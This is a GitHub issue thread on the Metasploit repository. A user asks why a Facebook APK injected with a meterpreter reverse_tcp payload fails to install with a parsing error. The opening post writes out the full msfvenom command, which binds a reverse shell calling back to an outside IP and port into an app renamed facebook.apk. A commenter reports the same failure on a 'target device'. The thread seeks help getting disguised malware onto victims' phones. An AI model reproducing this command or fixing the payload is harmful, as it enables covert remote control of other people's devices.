### ISSUE TITLE
Apk Parsing package Error ! After injecting Payload in apk file  

### ISSUE THREAD

**Issue by knitesh656** [rapid7/metasploit-framework#18236]
Hi  please help me to understand this ... 

I ran this cammand ..

Msfvenom -x fb.apk -p android/meterpreter/reverse_tcp lhost=23.19.10.45 lport=4444 -o facebook.apk

After running above command payload is getting bind with apk file and payload generated successfully but . As i tried to run the apk in mobile getting error - there was a problem while parsing the packages .

Please help .

**Comment by frankiephs** [comment]
same issue encountered, parsing error when trying to be opened on the target device
